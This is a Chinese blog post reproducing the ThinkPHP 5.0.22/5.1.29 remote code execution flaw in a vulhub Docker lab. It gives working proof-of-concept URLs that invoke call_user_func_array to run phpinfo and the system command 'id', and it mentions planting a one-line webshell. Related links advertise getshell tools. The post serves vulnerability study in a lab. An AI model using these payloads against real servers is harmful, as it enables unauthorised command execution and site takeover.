Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞

最新推荐文章于 2024-04-27 09:50:52 发布
最新推荐文章于 2024-04-27 09:50:52 发布
阅读量1.8k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44842234/article/details/125835173
版权

Thinkphp RCE

0x00 漏洞原理

ThinkPHP是国内使用极为广泛的PHP开发框架。在其版本 5 中,由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。
 
 

0x01 影响版本

Thinkphp =5.0.22 / 5.1.29

 
 

0x02 环境搭建
cd vulhub-master/thinkphp/5-rce   #进入vulhub靶场
docker-compose up -d

请添加图片描述
 
 

0x03 漏洞复现
 访问http://your-ip:8080,可以看到ThinkPHP的默认页面

请添加图片描述
 
 
POC1

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1    

访问该POC1可以看到执行了phpinfo

请添加图片描述

 
 
POC2

 http://192.168.68.168:8080//index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

访问POC2可以看到执行了id

请添加图片描述
 
 

用工具探测,成功探测到该漏洞

请添加图片描述
 
 

写入一句话木马

请添加图片描述
 
 

请添加图片描述
 
 

成功连上执行命令

请添加图片描述
 
 
 
 
 
参考链接
https://vulhub.org/#/environments/thinkphp/5-rce/
https://www.freebuf.com/articles/web/274062.html

TheK403
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHPGUI--tpgetshell工具
02-17
ThinkPHPGUI Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell
thinkphp5 5.0.22/5.1.29远程代码执行漏洞
最新发布
weixin_45653478的博客
04-27 851
ThinkPHP是中国使用极为广泛的PHP开发框架。在其版本 5 中,由于框架错误地处理了控制器名称,如果网站未启用强制路由(默认),它可以执行任何方法,从而导致 RCE 漏洞
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 1912
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
thinkphp漏洞利用工具-ThinkphpGUI(一)
siu~
08-17 3390
Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
thinkphp漏洞利用工具-thinkphp_gui_tools(三)
siu~
08-17 3261
ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-19 2773
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
thinkPHP5.0.22
12-06
ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业...
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
thinkphp漏洞检测工具
06-06
thinkphp漏洞检测工具
ThinkPHP5 5.0.22/5.1.29 RCE】
xhwfa的博客
05-02 3143
一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。 二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080,出现如
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 599
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
qq_53409748的博客
03-16 223
vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
[ 网络安全]MPHP(ThinkPHPV5.0.23原理刨析)漏洞利用工具
03-03 946
ThinkPHPV5.0.23漏洞利用工具
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3729
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
反序列化漏洞+ThinkPHP工具使用+shiro例工具使用
NSQ0207的博客
08-03 587
在url栏上输入O:4:"Flag":1:{s:4:"file";protected属性被序列化后属性名长度会增加3,因为属性名会变成%00*%00属性名。private属性被序列化后属性名会变成%00类名%00属性名。O代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示。这个方法会在一个对象被当作字符串时被调用,于是我们就能看到下面。s:4:"name" 字符串 属性值长度 属性值。运行11.php文件,获得序列化后的值。在vulhub文件内找到shiro漏洞
thinkphp3.2.3漏洞_TPscan一键ThinkPHP漏洞检测工具
weixin_39820244的博客
11-25 6441
1.简要描述这个工具写完有一段时间了,看网上目前还没有一个thinkphp漏洞集成检测工具,所以打算开源出来。2.代码结构插件化思想,所有的检测插件都在plugins目录里,TPscan.py主文件负责集中调度。插件目录:ThinkPHP 用户模块checkcode SQL注入漏洞ThinkPHP 5.0.23远程代码执行ThinkPHP 5.0.23 Debug模式远程代码执行Thi...
thinkphp 远程代码执行原理
01-12
根据提供的引用内容,ThinkPHP远程代码执行漏洞的原理是由于ThinkPHP框架对控制器名和方法名没有进行足够的检测,导致攻击者可以构造恶意请求来执行远程代码。 攻击者可以通过构造特定的请求,利用未正确处理的方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值